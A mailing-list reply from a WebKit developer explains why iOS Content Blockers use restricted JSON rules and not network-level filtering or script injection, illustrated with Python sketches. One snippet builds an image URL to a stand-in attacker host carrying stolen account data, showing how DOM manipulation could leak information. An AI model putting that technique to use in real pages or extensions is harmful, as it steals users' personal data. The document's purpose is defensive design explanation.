[webkit-help] Content blocker vs filtering

Mon Jul 6 16:37:21 PDT 2015

On 7/6/15 11:46 AM, signup_mail2002 at yahoo.com wrote:
> I am wondering whether WebKit's content blocking extension framework
> is different from the network content filtering announced for iOS 9?

That's a very good question.

The design of Content Blockers is quite different from the regular network 
filtering APIs.

Network filtering is usually agnostic of the type of content. Most of 
it is done at the network layers; some filtering inspects the raw 
content.

Content Blockers, on the other hand, sit very high in the stack. They 
have deep knowledge of browser concepts: they know about frames, the 
type of element making a request, etc.

Content Blockers are independent from network layers. They know 
nothing about IP addresses, what a protocol does, or anything like that.
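To make the contrast concrete, here is a simplified model, not WebKit's implementation, of how a single rule is evaluated. The rule follows the shape of the Content Blocker JSON format (a `trigger` with `url-filter`, `resource-type` and `load-type`, and an `action` of type `block`). The `Request` class, the `matches` helper and the ad host are hypothetical, and the third-party flag is passed in directly rather than derived from the page's domain. Note that the inputs are browser concepts (URL, resource type, first/third party) and that no IP address or protocol detail appears anywhere.

```python
import re
from dataclasses import dataclass

# One rule in the shape of the Content Blocker JSON format.
# Only a subset of trigger fields is modeled; the host is hypothetical.
RULE = {
    "trigger": {
        "url-filter": r"ads\.example\.com",
        "resource-type": ["image", "script"],
        "load-type": ["third-party"],
    },
    "action": {"type": "block"},
}

@dataclass
class Request:
    url: str
    resource_type: str  # browser-level concept, e.g. "image", "script", "document"
    third_party: bool   # simplified: supplied by the caller, not computed

def matches(rule: dict, req: Request) -> bool:
    """Return True if every trigger condition present in the rule holds."""
    trigger = rule["trigger"]
    if not re.search(trigger["url-filter"], req.url):
        return False
    types = trigger.get("resource-type")
    if types is not None and req.resource_type not in types:
        return False
    load_types = trigger.get("load-type")
    if load_types is not None:
        load = "third-party" if req.third_party else "first-party"
        if load not in load_types:
            return False
    return True

print(matches(RULE, Request("https://ads.example.com/banner.png", "image", True)))     # True
print(matches(RULE, Request("https://ads.example.com/banner.png", "document", True)))  # False
```

The same URL is blocked as a third-party image but not as a top-level document, which is exactly the kind of distinction a network-layer filter cannot see.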

> I am wondering if this can't be combined in functionality somewhat.
>
> First of all, all browsers on iOS have to use WebKit (as far as I know), so
> an extension would or could apply to all iOS browsers, right?

I don't think all browsers use WebKit, but yes, in theory any browser 
using WKWebView could enable extensions.

> Secondly, simpler content blocking is done via URL/IP matching against a
> local or remote blacklist (there is no way this can be expressed as JSON
> rules: too big, and how could they be updated efficiently?), as in WOT,
> SiteAdvisor, LinkChecker, Safe Web, etc.
>
> What these plug-ins do in general:
> 1) URL/IP scanning (e.g. category-based blocking, parental control)
> 2) content scanning (usually AV and ad scanning)
> 3) link annotation (same as #1 but adds info beside the link as a visual
> annotation). This requires a way to modify content (iOS is the only
> platform where this is not possible without resorting to a VPN/proxy,
> which is costly and slow)

Network-level blocking is not really in the scope of WebKit. You should 
file a radar at http://bugreport.apple.com with your use case.

The network on iOS and OS X is provided by system services and 
frameworks. WebKit just uses them.

> Basically we need the following entry points:
>
> 1) configuration for a block page and whitelist/blacklist (exception
> lists that are mutually exclusive, I imagine). If you define a RESTful
> protocol for filtering on URL/API and you do the caching (remember this
> can be used for parental control because it contains site categories and
> dangerous info), then we can simply provide a URL and define an
> authentication mechanism (e.g. an access token). This makes things simple
> for page blocking.
>
> 2) before a page loads, get an event to decide whether the page can be
> loaded. URL/IP info is needed. If WebKit uses a REST model, then we just
> configure the back-end info and WebKit handles everything else.
>
> 3) after the page is ready but before it is shown, give an event as an
> opportunity to inspect or modify the content (we are all sandboxed
> apps/extensions, so there should be no restriction on what we can do).
> Having the DOM object of the page, or allowing injection of JavaScript,
> would make things easy. If this is done at the network level, a MITM
> attack is needed to decrypt HTTPS traffic (as used by most if not all
> enterprise-grade filtering proxies), which is not something I
> particularly like.

We had good reasons not to do that.

Let me first respond to the idea that we can let arbitrary programs 
interact with pages if they are sandboxed. That is a capability we would 
really like as it gives a ton of power to developers, but it is not in 
the best interest of users.

There are too many ways to abuse the system and leak personal information.

For example, let's say we allow an extension to run arbitrary 
JavaScript. Such an extension could easily wait for you to log in to 
your bank and use XHR to send all your information to a server.

Now let's say we forbid JavaScript but allow DOM manipulation. Some 
websites use attribute values to define how they send their own XHRs. 
If your extension changes them, it can start stealing user information.

You can also just URL-encode the information you want to steal and use 
it as the source of an image.
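A small illustration of why DOM manipulation alone is enough to leak data: any value read from the page can be packed into the query string of an image URL, and the browser sends it out when it fetches the image. The collector host, the `exfiltration_url` helper and the field names are hypothetical; only `urllib.parse.urlencode` is a real library call.

```python
from urllib.parse import urlencode

def exfiltration_url(collector: str, stolen: dict) -> str:
    """Pack arbitrary page data into the query string of an image URL."""
    return collector + "?" + urlencode(stolen)

url = exfiltration_url(
    "https://collector.example/pixel.gif",  # hypothetical attacker-controlled host
    {"account": "12345678", "balance": "1000"},
)
print(url)  # https://collector.example/pixel.gif?account=12345678&balance=1000
# Setting an <img> element's src to this URL makes the browser issue a GET
# that carries the data, with no script execution involved.
```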

Allowing arbitrary changes would just put us in a whack-a-mole situation 
where there is no clear path to protect users.

--

Another important aspect is performance. Classic extensions have 
introduced significant delays in page loading.

In the new model, we do not have Turing-complete machines but a 
severely restricted model. As a result, we can guarantee a very small 
overhead by default.

Extensions lose a lot of power with these deterministic machines, but 
the result is multiple orders of magnitude faster. In my opinion, it is 
great that people won't have to choose between privacy and performance; 
it is possible to get both.
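A rough sketch of what "a restricted model" buys: the rule list is plain data, patterns are compiled once ahead of time, and evaluating a load is a bounded scan with no extension code running. Action names mirror the `block` and `ignore-previous-rules` action types of the Content Blocker format; the `CompiledRuleList` class and the tracker hosts are hypothetical. WebKit compiles its restricted regular-expression subset into its own automata; this sketch substitutes Python's `re` module, so it shows the evaluation model, not the actual speed.

```python
import re
from typing import List, Tuple

# Each rule: (url-filter pattern, action type). Only two action types are modeled.
Rule = Tuple[str, str]

class CompiledRuleList:
    def __init__(self, rules: List[Rule]) -> None:
        # Compile every pattern once, before any page load.
        self._rules = [(re.compile(pattern), action) for pattern, action in rules]

    def actions_for(self, url: str) -> List[str]:
        """Scan rules in order; a matching ignore-previous-rules drops earlier actions."""
        actions: List[str] = []
        for pattern, action in self._rules:
            if pattern.search(url):
                if action == "ignore-previous-rules":
                    actions.clear()
                else:
                    actions.append(action)
        return actions

    def should_block(self, url: str) -> bool:
        return "block" in self.actions_for(url)

rules = CompiledRuleList([
    (r"tracker\.example", "block"),
    (r"tracker\.example/allowed", "ignore-previous-rules"),
])
print(rules.should_block("https://tracker.example/pixel"))    # True
print(rules.should_block("https://tracker.example/allowed"))  # False
```

Because the extension only supplies data, the browser decides how and when the rules run, and the extension never sees which pages the user visits.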

> 4) if a page is blocked but then allowed to load, there must be a
> mechanism to let the page load without going into an infinite loop
> (i.e. a temporary unblock)
>
> I think the JSON format is good for simple static logic but not
> necessarily flexible enough for all cases. In my opinion it is not very
> future-proof (let third parties worry about the filtering/blocking logic).
>
> Let me know if there is another mailing list for the content filtering I
> am talking about, or if I am missing something about this new feature.

As a final note, as you may see with iOS 9, iOS extensibility is a very 
active area of development.

My rationale for Content Blockers does not make your use cases go away. 
We want to know about those use cases and find ways to do better. Please 
file bug reports at http://bugreport.apple.com explaining what problems 
you are trying to solve and why Content Blockers are not a good solution 
for you.

All the feedback helps us continuously improve iOS.

Cheers,
Benjamin